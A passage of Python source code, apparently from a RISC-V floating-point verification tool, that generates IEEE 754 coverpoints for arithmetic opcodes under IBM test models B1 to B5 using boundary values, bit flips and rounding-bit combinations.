dmaxsubnorm + dminnorm + [dnorm[0], dnorm[1]] + dmaxnorm + \
dinfinity + ddefaultnan + [dqnan[0], dqnan[1]] + \
[dsnan[0], dsnan[1]] + done
else:
logger.error('Invalid flen value!')
sys.exit(1)
# the following creates a cross product for ops number of variables
b1_comb = list(itertools.product(*ops*[basic_types]))
coverpoints = []
for c in b1_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
if opcode.split('.')[0] in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
cvpt += 'rm_val == 0'
elif opcode.split('.')[0] in ["fclass","flt","fmax","fsgnjn"]:
cvpt += 'rm_val == 1'
elif opcode.split('.')[0] in ["feq","flw","fsw","fsgnjx"]:
cvpt += 'rm_val == 2'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B1 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b2(flen, opcode, ops, int_val = 100, seed = -1):
'''
IBM Model B2 Definition:
This model tests final results that are very close, measured in Hamming
distance, to the specified boundary values. Each boundary value is taken as a
base value, and the model enumerates over small deviations from the base, by
flipping one bit of the significand.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param int_val: Number to define the range in which the random value is to be generated. (Predefined to 100)
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:type int_val: int
:param seed: int
Abstract Dataset Description:
Final Results = [Zero, One, MinSubNorm, MaxSubNorm, MinNorm, MaxNorm]
Operand1 {operation} Operand2 = Final Results
Implementation:
- Hamming distance is calculated using an xor operation between a number in the dataset and a number generated using walking ones operation.
- A random operand value for one of the operands is assigned and based on the result and operation under consideration, the next operand is calculated.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with the respective rounding mode for that particular opcode.
'''
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
b = '0x00000010'
e_sz=8
m_sz = 23
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
b = '0x0000000000000010'
e_sz=11
m_sz = 52
result = []
b2_comb = []
opcode = opcode.split('.')[0]
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
for i in range(len(flip_types)):
k=1
for j in range (1,24):
#print('{:010b}'.format(k))
result.append(['0x'+hex(eval(bin(int('1'+flip_types[i][2:], 16))) ^ eval('0b'+'{:023b}'.format(k)))[3:],' | Result = '+num_explain(flen, '0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:]))+'(0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:])+')^'+str('0x'+hex(eval('0b'+'1'+'{:024b}'.format(k)))[3:])])
k=k*2
for i in range(len(result)):
bin_val = bin(int('1'+result[i][0][2:],16))[3:]
rsgn = bin_val[0]
rexp = bin_val[1:e_sz+1]
rman = bin_val[e_sz+1:]
rs1_exp = rs3_exp = rexp
rs1_bin = bin(random.randrange(1,int_val))
rs3_bin = bin(random.randrange(1,int_val))
rs1_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs1_bin)-2)))+rs1_bin[2:])
rs3_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs3_bin)-2)))+rs3_bin[2:])
rs1 = fields_dec_converter(flen,'0x'+hex(int('1'+rs1_bin[2:],2))[3:])
rs3 = fields_dec_converter(flen,'0x'+hex(int('1'+rs3_bin[2:],2))[3:])
if opcode in 'fadd':
rs2 = fields_dec_converter(flen,result[i][0]) - rs1
elif opcode in 'fsub':
rs2 = rs1 - fields_dec_converter(flen,result[i][0])
elif opcode in 'fmul':
rs2 = fields_dec_converter(flen,result[i][0])/rs1
elif opcode in 'fdiv':
if fields_dec_converter(flen,result[i][0]) != 0:
rs2 = rs1/fields_dec_converter(flen,result[i][0])
elif opcode in 'fsqrt':
rs2 = fields_dec_converter(flen,result[i][0])*fields_dec_converter(flen,result[i][0])
elif opcode in 'fmadd':
rs2 = (fields_dec_converter(flen,result[i][0]) - rs3)/rs1
elif opcode in 'fnmadd':
rs2 = (rs3 - fields_dec_converter(flen,result[i][0]))/rs1
elif opcode in 'fmsub':
rs2 = (fields_dec_converter(flen,result[i][0]) + rs3)/rs1
elif opcode in 'fnmsub':
rs2 = -1*(rs3 + fields_dec_converter(flen,result[i][0]))/rs1
if(flen==32):
m = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
m = rs2
if opcode in ['fadd','fsub','fmul','fdiv']:
b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m)))
elif opcode in 'fsqrt':
b2_comb.append((floatingPoint_tohex(flen,m),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m),floatingPoint_tohex(flen,rs3)))
#print("b2_comb",b2_comb)
coverpoints = []
k=0
for c in b2_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += result[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B2 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b3(flen, opcode, ops, seed=-1):
'''
IBM Model B3 Definition:
This model tests all combinations of the sign, significand’s LSB, guard bit & sticky bit of the intermediate result.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result is chosen at random
Intermediate Result = [All possible combinations of Sign, LSB, Guard and Sticky are taken]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The Sticky bit is 1 if there were non-zero digits to the right of the guard digit, hence the lsb list is subjected to that condition.
- Float_val [ a list of numbers ] extracted from the fields_dec_converter is checked for the LSB. If it is a negative number, then the list ieee754_num is appended with splitting the p character and first 10 characters in the 0th split + ‘p’ + other part of the split. “p” specifies the maximum available number in python and used in 64 bit architecture. If we require a digit more than thea number, then we represent it using a string because an int
- Now the ir_dataset is initialized and since the ieee754_num list has the same element twice [ first is just the number and second is with sign ], hence we loop that array, considering only multiples of 2 elements from it. If the sign is ‘-’, then then the index is updated with 1 else if it is ‘+’, then it is updated with 0 complying with the IEEE standards.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
lsb = []
for i in fsubnorm+fnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
else:
ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
lsb = []
for i in dsubnorm+dnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = str(fields_dec_converter(64,i))
if float_val[0] != '-':
ieee754_num.append(float_val)
ieee754_num.append('-'+float_val)
else:
ieee754_num.append(float_val)
ieee754_num.append(float_val[1:])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
b4_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b4_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B3 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b4(flen, opcode, ops, seed=-1):
'''
IBM Model B4 Definition:
This model creates a test-case for each of the following constraints on the
intermediate results:
1. All the numbers in the range [+MaxNorm – 3 ulp, +MaxNorm + 3 ulp]
2. All the numbers in the range [-MaxNorm - 3 ulp, -MaxNorm + 3 ulp]
3. A random number that is larger than +MaxNorm + 3 ulp
4. A random number that is smaller than -MaxNorm – 3 ulp
5. One number for every exponent in the range [MaxNorm.exp - 3, MaxNorm.exp + 3] for positive and negative numbers
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [[MaxNorm-3 ulp, MaxNorm+3 ulp], [-MaxNorm-3 ulp, -MaxNorm+3 ulp], Random Num > MaxNorm+3 ulp, Random Num < -MaxNorm-3 ulp, [MaxNorm.exp-3, MaxNorm.exp+3]]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
if flen == 32:
ieee754_maxnorm_p = '0x1.7fffffp+127'
ieee754_maxnorm_n = '0x1.7ffffep+127'
maxnum = float.fromhex(ieee754_maxnorm_p)
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
for i in range(-3,4):
ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = +ve'])
ir_dataset.append(['-'+ieee754_maxnorm_n.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = -ve'])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
maxdec_p = str(maxnum)
maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
for i in range(-3,4):
ir_dataset.append([str(random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = +ve'])
ir_dataset.append([str(-1*random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = -ve'])
b4_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b4_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B4 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b5(flen, opcode, ops, seed=-1):
'''
IBM Model B5 Definition:
This model creates a test-case for each of the following constraints on the intermediate results:
1. All the numbers in the range [+MinSubNorm – 3 ulp, +MinSubNorm + 3 ulp]
2. All the numbers in the range [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp]
3. All the numbers in the range [MinNorm – 3 ulp, MinNorm + 3 ulp]
4. All the numbers in the range [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp]
5. All the numbers in the range [MinNorm – 3 ulp, MinNorm + 3 ulp]
6. All the numbers in the range [-MinNorm - 3 ulp, -MinNorm + 3 ulp]
7. A random number in the range (0, MinSubNorm)
8. A random number in the range (-MinSubNorm, -0)
9. One number for every exponent in the range [MinNorm.exp, MinNorm.exp + 5]
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [+MinSubNorm – 3 ulp, +MinSubNorm + 3 ulp], [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp] , [MinNorm – 3 ulp, MinNorm + 3 ulp] , [-MinNorm - 3 ulp, -MinNorm + 3 ulp] , Random Num in (0, MinSubNorm), Random Num in (-MinSubNorm, -0), One Num for every exp in [MinNorm.exp, MinNorm.exp + 5]]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
ir_dataset = []
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
ieee754_minnorm = '0x1.000000p-126'
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
minnorm_Exp = ['0x1.000000p-126','0x1.000000p-125','0x1.000000p-124','0x1.000000p-123','0x1.000000p-122','0x1.000000p-121']
for i in minnorm_Exp:
ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(126+int(i.split('p')[1]))])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
minsubdec = '5e-324'
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
minnormdec = '2.2250738585072014e-308'
ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
minnorm_Exp = ['4.450147717014403e-308','8.900295434028806e-308','1.780059086805761e-307','3.560118173611522e-307','7.120236347223044e-307']
k = 1
for i in minnorm_Exp:
ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(k)])
k += 1
n = len(ir_dataset)
for i in range(n):
ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
b5_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b5_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b5_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
